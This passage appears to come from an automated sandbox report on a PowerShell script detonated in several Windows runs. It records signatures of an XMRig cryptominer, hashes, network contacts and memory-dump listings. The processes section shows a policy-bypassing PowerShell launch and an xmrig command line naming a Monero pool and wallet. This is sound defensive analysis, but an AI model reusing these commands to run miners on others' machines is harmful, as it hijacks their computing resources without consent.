memory/1952-57-0x0000020694450000-0x0000020694470000-memory.dmp
memory/1952-56-0x0000020694430000-0x0000020694450000-memory.dmp
memory/1952-58-0x00007FF7BB2D0000-0x00007FF7BBF03000-memory.dmp
memory/1952-59-0x00007FF7BB2D0000-0x00007FF7BBF03000-memory.dmp
memory/1952-60-0x00007FF7BB2D0000-0x00007FF7BBF03000-memory.dmp
memory/1952-61-0x00007FF7BB2D0000-0x00007FF7BBF03000-memory.dmp
memory/1952-62-0x00007FF7BB2D0000-0x00007FF7BBF03000-memory.dmp
memory/1952-63-0x00007FF7BB2D0000-0x00007FF7BBF03000-memory.dmp
memory/1952-64-0x00007FF7BB2D0000-0x00007FF7BBF03000-memory.dmp
memory/1952-65-0x00007FF7BB2D0000-0x00007FF7BBF03000-memory.dmp
memory/1952-66-0x00007FF7BB2D0000-0x00007FF7BBF03000-memory.dmp
memory/1952-67-0x00007FF7BB2D0000-0x00007FF7BBF03000-memory.dmp
memory/1952-68-0x00007FF7BB2D0000-0x00007FF7BBF03000-memory.dmp
memory/1952-69-0x00007FF7BB2D0000-0x00007FF7BBF03000-memory.dmp
memory/1952-70-0x00007FF7BB2D0000-0x00007FF7BBF03000-memory.dmp
memory/1952-71-0x00007FF7BB2D0000-0x00007FF7BBF03000-memory.dmp
memory/1952-72-0x00007FF7BB2D0000-0x00007FF7BBF03000-memory.dmp
memory/1952-73-0x00007FF7BB2D0000-0x00007FF7BBF03000-memory.dmp
memory/1952-74-0x00007FF7BB2D0000-0x00007FF7BBF03000-memory.dmp
memory/1952-75-0x00007FF7BB2D0000-0x00007FF7BBF03000-memory.dmp
memory/1952-76-0x00007FF7BB2D0000-0x00007FF7BBF03000-memory.dmp
memory/1952-77-0x00007FF7BB2D0000-0x00007FF7BBF03000-memory.dmp
memory/1952-78-0x00007FF7BB2D0000-0x00007FF7BBF03000-memory.dmp
memory/1952-79-0x00007FF7BB2D0000-0x00007FF7BBF03000-memory.dmp
memory/1952-80-0x00007FF7BB2D0000-0x00007FF7BBF03000-memory.dmp
memory/1952-81-0x00007FF7BB2D0000-0x00007FF7BBF03000-memory.dmp
memory/1952-82-0x00007FF7BB2D0000-0x00007FF7BBF03000-memory.dmp
memory/1952-83-0x00007FF7BB2D0000-0x00007FF7BBF03000-memory.dmp
memory/1952-84-0x00007FF7BB2D0000-0x00007FF7BBF03000-memory.dmp
memory/1952-85-0x00007FF7BB2D0000-0x00007FF7BBF03000-memory.dmp
memory/1952-86-0x00007FF7BB2D0000-0x00007FF7BBF03000-memory.dmp
memory/1952-87-0x00007FF7BB2D0000-0x00007FF7BBF03000-memory.dmp
memory/1952-88-0x00007FF7BB2D0000-0x00007FF7BBF03000-memory.dmp
memory/1952-89-0x00007FF7BB2D0000-0x00007FF7BBF03000-memory.dmp
memory/1952-90-0x00007FF7BB2D0000-0x00007FF7BBF03000-memory.dmp
memory/1952-91-0x00007FF7BB2D0000-0x00007FF7BBF03000-memory.dmp
memory/1952-92-0x00007FF7BB2D0000-0x00007FF7BBF03000-memory.dmp
memory/1952-93-0x00007FF7BB2D0000-0x00007FF7BBF03000-memory.dmp
memory/1952-94-0x00007FF7BB2D0000-0x00007FF7BBF03000-memory.dmp
memory/1952-95-0x00007FF7BB2D0000-0x00007FF7BBF03000-memory.dmp
memory/1952-96-0x00007FF7BB2D0000-0x00007FF7BBF03000-memory.dmp
memory/1952-97-0x00007FF7BB2D0000-0x00007FF7BBF03000-memory.dmp
memory/1952-98-0x00007FF7BB2D0000-0x00007FF7BBF03000-memory.dmp
memory/1952-99-0x00007FF7BB2D0000-0x00007FF7BBF03000-memory.dmp
memory/1952-100-0x00007FF7BB2D0000-0x00007FF7BBF03000-memory.dmp
memory/1952-101-0x00007FF7BB2D0000-0x00007FF7BBF03000-memory.dmp
memory/1952-102-0x00007FF7BB2D0000-0x00007FF7BBF03000-memory.dmp
memory/1952-103-0x00007FF7BB2D0000-0x00007FF7BBF03000-memory.dmp
memory/1952-104-0x00007FF7BB2D0000-0x00007FF7BBF03000-memory.dmp
memory/1952-105-0x00007FF7BB2D0000-0x00007FF7BBF03000-memory.dmp
memory/1952-106-0x00007FF7BB2D0000-0x00007FF7BBF03000-memory.dmp
memory/1952-107-0x00007FF7BB2D0000-0x00007FF7BBF03000-memory.dmp
memory/1952-108-0x00007FF7BB2D0000-0x00007FF7BBF03000-memory.dmp
memory/1952-109-0x00007FF7BB2D0000-0x00007FF7BBF03000-memory.dmp
memory/1952-110-0x00007FF7BB2D0000-0x00007FF7BBF03000-memory.dmp
memory/1952-111-0x00007FF7BB2D0000-0x00007FF7BBF03000-memory.dmp
memory/1952-112-0x00007FF7BB2D0000-0x00007FF7BBF03000-memory.dmp
memory/1952-113-0x00007FF7BB2D0000-0x00007FF7BBF03000-memory.dmp
memory/1952-114-0x00007FF7BB2D0000-0x00007FF7BBF03000-memory.dmp
memory/1952-115-0x00007FF7BB2D0000-0x00007FF7BBF03000-memory.dmp
memory/1952-116-0x00007FF7BB2D0000-0x00007FF7BBF03000-memory.dmp
Analysis: behavioral23
Detonation Overview
Submitted
2024-07-04 03:15
Reported
2024-07-04 09:36
Platform
win10v2004-20240508-en
Max time kernel
1791s
Max time network
1802s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 5076 wrote to memory of 4724 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 5076 wrote to memory of 4724 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (15) - copia.ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 149.220.183.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.111.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 73.144.22.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.111.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | gulf.moneroocean.stream | udp |
| DE | 149.102.143.109:10128 | gulf.moneroocean.stream | tcp |
| US | 8.8.8.8:53 | 109.143.102.149.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.211.185.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 50.23.12.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 147.142.123.92.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.205.248.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 91.16.208.104.in-addr.arpa | udp |
Files
memory/5076-0-0x00007FF9D6763000-0x00007FF9D6765000-memory.dmp
memory/5076-6-0x000001F97B950000-0x000001F97B972000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_l50dkdnb.4ga.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/5076-11-0x00007FF9D6760000-0x00007FF9D7221000-memory.dmp
memory/5076-12-0x00007FF9D6760000-0x00007FF9D7221000-memory.dmp
memory/5076-14-0x00007FF9D6760000-0x00007FF9D7221000-memory.dmp
memory/5076-15-0x000001F97C3F0000-0x000001F97C402000-memory.dmp
memory/5076-16-0x000001F97B3D0000-0x000001F97B3DA000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/4724-47-0x000001FDE72C0000-0x000001FDE72E0000-memory.dmp
memory/4724-48-0x000001FDE7310000-0x000001FDE7330000-memory.dmp
memory/4724-49-0x00007FF62BB60000-0x00007FF62C793000-memory.dmp
memory/5076-51-0x00007FF9D6760000-0x00007FF9D7221000-memory.dmp
memory/4724-50-0x00007FF62BB60000-0x00007FF62C793000-memory.dmp
memory/4724-53-0x000001FE799C0000-0x000001FE799E0000-memory.dmp
memory/4724-54-0x000001FE79790000-0x000001FE797B0000-memory.dmp
memory/5076-52-0x00007FF9D6763000-0x00007FF9D6765000-memory.dmp
memory/5076-55-0x00007FF9D6760000-0x00007FF9D7221000-memory.dmp
memory/4724-56-0x00007FF62BB60000-0x00007FF62C793000-memory.dmp
memory/4724-57-0x00007FF62BB60000-0x00007FF62C793000-memory.dmp
memory/4724-59-0x000001FE79790000-0x000001FE797B0000-memory.dmp
memory/4724-58-0x000001FE799C0000-0x000001FE799E0000-memory.dmp
memory/4724-60-0x00007FF62BB60000-0x00007FF62C793000-memory.dmp
memory/4724-61-0x00007FF62BB60000-0x00007FF62C793000-memory.dmp
memory/4724-62-0x00007FF62BB60000-0x00007FF62C793000-memory.dmp
memory/4724-63-0x00007FF62BB60000-0x00007FF62C793000-memory.dmp
memory/4724-64-0x00007FF62BB60000-0x00007FF62C793000-memory.dmp
memory/4724-65-0x00007FF62BB60000-0x00007FF62C793000-memory.dmp
memory/4724-66-0x00007FF62BB60000-0x00007FF62C793000-memory.dmp
memory/4724-67-0x00007FF62BB60000-0x00007FF62C793000-memory.dmp
memory/4724-68-0x00007FF62BB60000-0x00007FF62C793000-memory.dmp
memory/4724-69-0x00007FF62BB60000-0x00007FF62C793000-memory.dmp
memory/4724-70-0x00007FF62BB60000-0x00007FF62C793000-memory.dmp
memory/4724-71-0x00007FF62BB60000-0x00007FF62C793000-memory.dmp
memory/4724-72-0x00007FF62BB60000-0x00007FF62C793000-memory.dmp
memory/4724-73-0x00007FF62BB60000-0x00007FF62C793000-memory.dmp
memory/4724-74-0x00007FF62BB60000-0x00007FF62C793000-memory.dmp
memory/4724-75-0x00007FF62BB60000-0x00007FF62C793000-memory.dmp
memory/4724-76-0x00007FF62BB60000-0x00007FF62C793000-memory.dmp
memory/4724-77-0x00007FF62BB60000-0x00007FF62C793000-memory.dmp
memory/4724-78-0x00007FF62BB60000-0x00007FF62C793000-memory.dmp
memory/4724-79-0x00007FF62BB60000-0x00007FF62C793000-memory.dmp
memory/4724-80-0x00007FF62BB60000-0x00007FF62C793000-memory.dmp
memory/4724-81-0x00007FF62BB60000-0x00007FF62C793000-memory.dmp
memory/4724-82-0x00007FF62BB60000-0x00007FF62C793000-memory.dmp
memory/4724-83-0x00007FF62BB60000-0x00007FF62C793000-memory.dmp
memory/4724-84-0x00007FF62BB60000-0x00007FF62C793000-memory.dmp
memory/4724-85-0x00007FF62BB60000-0x00007FF62C793000-memory.dmp
memory/4724-86-0x00007FF62BB60000-0x00007FF62C793000-memory.dmp
memory/4724-87-0x00007FF62BB60000-0x00007FF62C793000-memory.dmp
memory/4724-88-0x00007FF62BB60000-0x00007FF62C793000-memory.dmp
memory/4724-89-0x00007FF62BB60000-0x00007FF62C793000-memory.dmp
memory/4724-90-0x00007FF62BB60000-0x00007FF62C793000-memory.dmp
memory/4724-91-0x00007FF62BB60000-0x00007FF62C793000-memory.dmp
memory/4724-92-0x00007FF62BB60000-0x00007FF62C793000-memory.dmp
memory/4724-93-0x00007FF62BB60000-0x00007FF62C793000-memory.dmp
memory/4724-94-0x00007FF62BB60000-0x00007FF62C793000-memory.dmp
memory/4724-95-0x00007FF62BB60000-0x00007FF62C793000-memory.dmp
memory/4724-96-0x00007FF62BB60000-0x00007FF62C793000-memory.dmp
memory/4724-97-0x00007FF62BB60000-0x00007FF62C793000-memory.dmp
memory/4724-98-0x00007FF62BB60000-0x00007FF62C793000-memory.dmp
memory/4724-99-0x00007FF62BB60000-0x00007FF62C793000-memory.dmp
memory/4724-100-0x00007FF62BB60000-0x00007FF62C793000-memory.dmp
memory/4724-101-0x00007FF62BB60000-0x00007FF62C793000-memory.dmp
memory/4724-102-0x00007FF62BB60000-0x00007FF62C793000-memory.dmp
memory/4724-103-0x00007FF62BB60000-0x00007FF62C793000-memory.dmp
memory/4724-104-0x00007FF62BB60000-0x00007FF62C793000-memory.dmp
memory/4724-105-0x00007FF62BB60000-0x00007FF62C793000-memory.dmp
memory/4724-106-0x00007FF62BB60000-0x00007FF62C793000-memory.dmp
memory/4724-107-0x00007FF62BB60000-0x00007FF62C793000-memory.dmp
memory/4724-108-0x00007FF62BB60000-0x00007FF62C793000-memory.dmp
memory/4724-109-0x00007FF62BB60000-0x00007FF62C793000-memory.dmp
memory/4724-110-0x00007FF62BB60000-0x00007FF62C793000-memory.dmp
memory/4724-111-0x00007FF62BB60000-0x00007FF62C793000-memory.dmp
memory/4724-112-0x00007FF62BB60000-0x00007FF62C793000-memory.dmp
memory/4724-113-0x00007FF62BB60000-0x00007FF62C793000-memory.dmp
memory/4724-114-0x00007FF62BB60000-0x00007FF62C793000-memory.dmp
memory/4724-115-0x00007FF62BB60000-0x00007FF62C793000-memory.dmp
memory/4724-116-0x00007FF62BB60000-0x00007FF62C793000-memory.dmp
memory/4724-117-0x00007FF62BB60000-0x00007FF62C793000-memory.dmp
memory/4724-118-0x00007FF62BB60000-0x00007FF62C793000-memory.dmp
Analysis: behavioral24
Detonation Overview
Submitted
2024-07-04 03:15
Reported
2024-07-04 09:36
Platform
win11-20240508-en
Max time kernel
1702s
Max time network
1711s
Command Line
Signatures
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (15) - copia.ps1"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
Files
memory/4260-0-0x00007FFAC46D3000-0x00007FFAC46D5000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_blu3upbx.mhy.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/4260-9-0x0000010EAB620000-0x0000010EAB642000-memory.dmp
memory/4260-10-0x00007FFAC46D0000-0x00007FFAC5192000-memory.dmp
memory/4260-11-0x00007FFAC46D0000-0x00007FFAC5192000-memory.dmp
memory/4260-12-0x00007FFAC46D0000-0x00007FFAC5192000-memory.dmp
memory/4260-13-0x00007FFAC46D3000-0x00007FFAC46D5000-memory.dmp
memory/4260-14-0x00007FFAC46D0000-0x00007FFAC5192000-memory.dmp
Analysis: behavioral27
Detonation Overview
Submitted
2024-07-04 03:15
Reported
2024-07-04 09:36
Platform
win10v2004-20240611-en
Max time kernel
1793s
Max time network
1794s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4860 wrote to memory of 2120 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 4860 wrote to memory of 2120 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9) - copia.ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.109.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 228.249.119.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.109.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| GB | 184.28.176.34:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 73.31.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.211.185.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 34.176.28.184.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 88.156.103.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | gulf.moneroocean.stream | udp |
| DE | 149.102.143.109:10128 | gulf.moneroocean.stream | tcp |
| US | 8.8.8.8:53 | 58.55.71.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 109.143.102.149.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 157.123.68.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 45.56.20.217.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 81.144.22.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 10.179.89.13.in-addr.arpa | udp |
Files
memory/4860-0-0x00007FF9F2B33000-0x00007FF9F2B35000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_kob5yxpy.axk.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/4860-10-0x0000017DFD6B0000-0x0000017DFD6D2000-memory.dmp
memory/4860-11-0x00007FF9F2B30000-0x00007FF9F35F1000-memory.dmp
memory/4860-12-0x00007FF9F2B30000-0x00007FF9F35F1000-memory.dmp
memory/4860-14-0x00007FF9F2B30000-0x00007FF9F35F1000-memory.dmp
memory/4860-15-0x0000017DFE270000-0x0000017DFE282000-memory.dmp
memory/4860-16-0x0000017DFD740000-0x0000017DFD74A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/2120-47-0x0000022B9C3D0000-0x0000022B9C3F0000-memory.dmp
memory/2120-48-0x0000022B9DCD0000-0x0000022B9DCF0000-memory.dmp
memory/2120-49-0x00007FF62AF90000-0x00007FF62BBC3000-memory.dmp
memory/2120-50-0x00007FF62AF90000-0x00007FF62BBC3000-memory.dmp
memory/4860-51-0x00007FF9F2B33000-0x00007FF9F2B35000-memory.dmp
memory/4860-52-0x00007FF9F2B30000-0x00007FF9F35F1000-memory.dmp
memory/2120-54-0x0000022B9DD10000-0x0000022B9DD30000-memory.dmp
memory/2120-53-0x0000022B9DCF0000-0x0000022B9DD10000-memory.dmp
memory/4860-55-0x00007FF9F2B30000-0x00007FF9F35F1000-memory.dmp
memory/2120-56-0x00007FF62AF90000-0x00007FF62BBC3000-memory.dmp
memory/2120-57-0x00007FF62AF90000-0x00007FF62BBC3000-memory.dmp
memory/2120-58-0x0000022B9DCF0000-0x0000022B9DD10000-memory.dmp
memory/2120-59-0x0000022B9DD10000-0x0000022B9DD30000-memory.dmp
memory/2120-60-0x00007FF62AF90000-0x00007FF62BBC3000-memory.dmp
memory/2120-61-0x00007FF62AF90000-0x00007FF62BBC3000-memory.dmp
memory/2120-62-0x00007FF62AF90000-0x00007FF62BBC3000-memory.dmp
memory/2120-63-0x00007FF62AF90000-0x00007FF62BBC3000-memory.dmp
memory/2120-64-0x00007FF62AF90000-0x00007FF62BBC3000-memory.dmp
memory/2120-65-0x00007FF62AF90000-0x00007FF62BBC3000-memory.dmp
memory/2120-66-0x00007FF62AF90000-0x00007FF62BBC3000-memory.dmp
memory/2120-67-0x00007FF62AF90000-0x00007FF62BBC3000-memory.dmp
memory/2120-68-0x00007FF62AF90000-0x00007FF62BBC3000-memory.dmp
memory/2120-69-0x00007FF62AF90000-0x00007FF62BBC3000-memory.dmp
memory/2120-70-0x00007FF62AF90000-0x00007FF62BBC3000-memory.dmp
memory/2120-71-0x00007FF62AF90000-0x00007FF62BBC3000-memory.dmp
memory/2120-72-0x00007FF62AF90000-0x00007FF62BBC3000-memory.dmp
memory/2120-73-0x00007FF62AF90000-0x00007FF62BBC3000-memory.dmp
memory/2120-74-0x00007FF62AF90000-0x00007FF62BBC3000-memory.dmp
memory/2120-75-0x00007FF62AF90000-0x00007FF62BBC3000-memory.dmp
memory/2120-76-0x00007FF62AF90000-0x00007FF62BBC3000-memory.dmp
memory/2120-77-0x00007FF62AF90000-0x00007FF62BBC3000-memory.dmp
memory/2120-78-0x00007FF62AF90000-0x00007FF62BBC3000-memory.dmp
memory/2120-79-0x00007FF62AF90000-0x00007FF62BBC3000-memory.dmp
memory/2120-80-0x00007FF62AF90000-0x00007FF62BBC3000-memory.dmp
memory/2120-81-0x00007FF62AF90000-0x00007FF62BBC3000-memory.dmp
memory/2120-82-0x00007FF62AF90000-0x00007FF62BBC3000-memory.dmp
memory/2120-83-0x00007FF62AF90000-0x00007FF62BBC3000-memory.dmp
memory/2120-84-0x00007FF62AF90000-0x00007FF62BBC3000-memory.dmp
memory/2120-85-0x00007FF62AF90000-0x00007FF62BBC3000-memory.dmp
memory/2120-86-0x00007FF62AF90000-0x00007FF62BBC3000-memory.dmp
memory/2120-87-0x00007FF62AF90000-0x00007FF62BBC3000-memory.dmp
memory/2120-88-0x00007FF62AF90000-0x00007FF62BBC3000-memory.dmp
memory/2120-89-0x00007FF62AF90000-0x00007FF62BBC3000-memory.dmp
memory/2120-90-0x00007FF62AF90000-0x00007FF62BBC3000-memory.dmp
memory/2120-91-0x00007FF62AF90000-0x00007FF62BBC3000-memory.dmp
memory/2120-92-0x00007FF62AF90000-0x00007FF62BBC3000-memory.dmp
memory/2120-93-0x00007FF62AF90000-0x00007FF62BBC3000-memory.dmp
memory/2120-94-0x00007FF62AF90000-0x00007FF62BBC3000-memory.dmp
memory/2120-95-0x00007FF62AF90000-0x00007FF62BBC3000-memory.dmp
memory/2120-96-0x00007FF62AF90000-0x00007FF62BBC3000-memory.dmp
memory/2120-97-0x00007FF62AF90000-0x00007FF62BBC3000-memory.dmp
memory/2120-98-0x00007FF62AF90000-0x00007FF62BBC3000-memory.dmp
memory/2120-99-0x00007FF62AF90000-0x00007FF62BBC3000-memory.dmp
memory/2120-100-0x00007FF62AF90000-0x00007FF62BBC3000-memory.dmp
memory/2120-101-0x00007FF62AF90000-0x00007FF62BBC3000-memory.dmp
memory/2120-102-0x00007FF62AF90000-0x00007FF62BBC3000-memory.dmp
memory/2120-103-0x00007FF62AF90000-0x00007FF62BBC3000-memory.dmp
memory/2120-104-0x00007FF62AF90000-0x00007FF62BBC3000-memory.dmp
memory/2120-105-0x00007FF62AF90000-0x00007FF62BBC3000-memory.dmp
memory/2120-106-0x00007FF62AF90000-0x00007FF62BBC3000-memory.dmp
memory/2120-107-0x00007FF62AF90000-0x00007FF62BBC3000-memory.dmp
memory/2120-108-0x00007FF62AF90000-0x00007FF62BBC3000-memory.dmp
memory/2120-109-0x00007FF62AF90000-0x00007FF62BBC3000-memory.dmp
memory/2120-110-0x00007FF62AF90000-0x00007FF62BBC3000-memory.dmp
memory/2120-111-0x00007FF62AF90000-0x00007FF62BBC3000-memory.dmp
memory/2120-112-0x00007FF62AF90000-0x00007FF62BBC3000-memory.dmp
memory/2120-113-0x00007FF62AF90000-0x00007FF62BBC3000-memory.dmp
